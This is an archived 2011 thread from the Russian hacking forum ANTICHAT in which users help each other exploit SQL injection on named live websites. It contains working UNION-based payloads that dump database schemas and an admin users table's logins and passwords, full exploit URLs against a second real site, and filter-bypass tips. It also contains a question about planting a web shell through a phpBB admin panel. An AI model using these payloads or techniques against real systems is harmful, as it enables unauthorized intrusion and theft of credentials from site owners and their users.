ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.10.2011, 21:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
помогите расскрутить
Код:
Code:
http://www.watchfashion.ru/search/
в поле поиск в Post запросе ошибка |
|
|
|
14.10.2011, 21:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от Faaax
Faaax said:
помогите расскрутить
Код:
Code:
http://www.watchfashion.ru/search/
в поле поиск в Post запросе ошибка В строке поиска:
Код:
Code:
') and false union select 1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5,6,7,8,9,10#
|
|
|
|
15.10.2011, 19:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
Сообщение от Expl0ited
Expl0ited said:
В строке поиска:
Код:
Code:
') and false union select 1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5,6,7,8,9,10#
не пойму почему дальше не выводится?!?!?
Код:
Code:
') and false union select 1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_name!=0x61646d696e5f7573657273)and(0x00)in(@x:=concat(@x,0x3c62723e,id,0x2e,login,0x3a,passwd))))x),4,5,6,7,8,9,10#
|
|
|
|
15.10.2011, 19:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от Faaax
Faaax said:
не пойму почему дальше не выводится?!?!?
Код:
Code:
') and false union select 1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_name!=0x61646d696e5f7573657273)and(0x00)in(@x:=concat(@x,0x3c62723e,id,0x2e,login,0x3a,passwd))))x),4,5,6,7,8,9,10#
Потому что необходимо знать базовый синтаксис SQL запросов.
|
|
|
|
16.10.2011, 18:24
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Codeblo
Codeblo said:
Я начал только изучать, не хочу по шаблону все делать, детально пару вопросов возникло:
1-ый вопрос, и т.д будет пронумеровано.
-------------------
site.com/index.php?id=
1+and+1=1
(Выводит страницу 1)
site.com/index.php?id=
1+and+1=2
(Выводит ошибку, или ничего не выводит, вобщем отличается от первого)
Итак: почему
1+and+1=1
-хотя тут должно было бы выдать ошибку так как дословно 1+и+1=2(но не один)
А когда запрос идет правильный:
1+and+1=2
дословно 1+и+1=2 -то выдает Ошибку- это из Фаг'а Джокера.
2. “
--
“это знак начала комментария - при расскрутки скули Вопросы:
2/1 Всегда ли нужно ставить в конце запроса "
--
"
2/2 В каких случаях Ставить
--
или
--+
или
+--
-по счет него -вопрос бывает ли такой? или
+--+
2/3 - имеется в виду допустим конец уже скули limit+23,1 --
Вопрос в том может ли из за пробелов -выдать ошибку - и стоит ли ставить проблемы вообще?
Пока все, спасибо за помощь.
AND это не операция сложения, это просто операция объединения выражений. Таким образом
1 and 1=1 означает выражение "если 1 истина И 1 РАВНО 1, то и все выражение истинно." Следовательно, выражение
1 and 1=2 означает "если 1 истина И 1 РАВНО 2, то выражение истинно", но т.к. 1 не равно 2, то все выражение ложно.
комментарий с пробелом ставится при многострочных запросах.
|
|
|
16.10.2011, 18:30
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944
Репутация:
37
|
|
Сообщение от попугай
попугай said:
AND это не операция сложения, это просто операция объединения выражений. Таким образом
1 and 1=1 означает выражение "если 1 истина И 1 РАВНО 1, то и все выражение истинно." Следовательно, выражение
1 and 1=2 означает "если 1 истина И 1 РАВНО 2, то выражение истинно", но т.к. 1 не равно 2, то все выражение ложно.
комментарий с пробелом ставится при многострочных запросах.
Не только при многострочных запросах, но и если переменная, в которую мы инжектим имеет тип string. В этом случае комментарий ставится для отсечения лишней кавычки ( ')
|
|
|
|
16.10.2011, 18:51
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Codeblo
Codeblo said:
2. “
--
“это знак начала комментария - при расскрутки скули Вопросы:
2/1 Всегда ли нужно ставить в конце запроса "
--
"
2/2 В каких случаях Ставить
--
или
--+
или
+--
-по счет него -вопрос бывает ли такой? или
+--+
2/3 - имеется в виду допустим конец уже скули limit+23,1 --
Вопрос в том может ли из за пробелов -выдать ошибку - и стоит ли ставить пробелы вообще?
Пока все, спасибо за помощь.
2.1 Нет, не всегда, только когда запрос многострочный (солидарен с Попугаем).
Как варианты, можно обрезать запросы либо нулл-байтом ( %00), или знаками комментариев ( /* или -- или # в зависимости от версий).
2.2 -- Ставится для обрезания дополнительной части основного запроса.
+ в этом случае играет роль пробела, то есть комментарий вида +--+ эквивалентен /**/--/**/.
Также вместо плюса можно использовать или пробел, или комментарий /**/ или знак табуляции %09 или скобки (0)union(select(1)). Всё зависит от конкретного случая. Точнее от используемой фильтрации.
Опять же зачастую бывает, что обрезать комментарием мало, поэтому в конце запроса вместо +--+ ставят +--+1
Одним словом, нужно экспериментировать на практике.
|
|
|
|
16.10.2011, 20:31
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от h00lyshit!
h00lyshit! said:
Это что за случаи такие? 0-day?
Самый простой, взятый из практики
Код:
Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6,7,8)--+ FALSE
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6,7,8)--+1 TRUE
Обнаружение SQL-инъекции = не всегда подстановка кавычек. Проверяется подзапросами
Код:
Code:
id=1+and+1=1
id=1+and+1=2
Разный результат говорит о наличии инъекций...
Опять же, способов выявления SQL-инъекций множество.
Боже мой, да что я тут распинаюсь, Уважаемый, почитайте мануалы про простейшим инъекциям, азы вам объяснять?? Тут ни у кого нет ни времени, ни желания. Помощь - другое дело.
|
|
|
|
17.10.2011, 00:22
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585
Репутация:
0
|
|
есть html файл с куском таблицы из wso.
тоесть тупо кусок вида
Код:
Code:
1 столбик / 2 столбик / 3 столбик / 4 столбик/
данные / данные / данные / данные /
в исходнике, всё это отображается вот так
Код:
Code:
1 столбик2 столбик3 столбик4 столбикданныеданныеданныеданные
мб кто обьяснит, или поможет как спарсить этот кусок до вида
Код:
Code:
1 столбик/ 2 столбик
данные / данные
|
|
|
|
17.10.2011, 00:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
65325
Репутация:
9
|
|
Сообщение от Nightmarе
Nightmarе said:
GroM88: шелл через восстановление базы данных льётся в phpBB 2, в phpBB 3 другой способ, правка шаблонов\темплейтов, но они должны быть доступны на запись.
И да, там могут стоять фильтры на выполнение php кода...
а можно поподробнее?а то уже минут 40 лазию по админке не могу никак залить
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
